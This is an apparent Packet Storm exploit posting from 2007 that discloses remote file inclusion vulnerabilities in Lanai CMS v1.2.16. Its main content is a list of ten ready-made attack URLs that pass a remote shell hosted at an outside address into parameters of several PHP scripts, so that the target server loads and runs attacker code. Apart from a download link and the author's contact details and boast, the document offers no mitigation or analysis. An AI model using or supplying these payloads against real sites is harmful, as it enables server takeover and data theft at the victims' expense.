lanai-rfi.txt

2007-11-13T00:00:00
ID PACKETSTORM:60852
Type packetstorm
Reporter fl0 fl0w
Modified 2007-11-13T00:00:00

Description

                                        
                                            `Lanai cms_v1.2.16 Content Management System Remote File Inclusion  
----------------------------------------------------------------------------------------------------------|  
Download :http://downloads.sourceforge.net/la-nai/lanai-cms_v1.2.16.tar.gz?modtime=1188204187&big_mirror=0|  
----------------------------------------------------------------------------------------------------------|  
-------|  
Exploit|  
-------|  
  
http://site.com/adodb.inc.php?path=http://host.com/evilshell?  
  
http://site.com/adodb.inc.php?file=http://host.com/evilshell?  
  
http://site.com/Smarty.class.php?smarty_compile_path=http://host.com/evilshell?  
  
http://site.com/index.php?modfunction=http://host.com/evilshell?  
  
http://site.com/send.php?modfunction=http://host.com/evilshell?  
  
http://site.com/checkoutconfirm.php?modfunction=http://host.com/evilshell?  
  
http://site.com/checkoutsave.php?modfunction=http://host.com/evilshell?  
  
http://site.com/prodview.php?modfunction=http://host.com/evilshell?  
  
http://site.com/faqviewgroup.php?modfunction=http://host.com/evilshell?  
  
http://site.com/xml_domit_rss_shared.php?pathToLibrary=http://host.com/evilshell?  
  
-----------------|  
Timeline:10.11.07|  
-----------------|  
------|  
Author|  
------|  
  
fl0 fl0w  
e-mail:flo[underscore]flow[underscore]supremacy[at]yahoo[dot]com  
site:http://fl0-fl0w.docspages.com  
A renslt.org team member ..."we're not the only ones but we're the best"`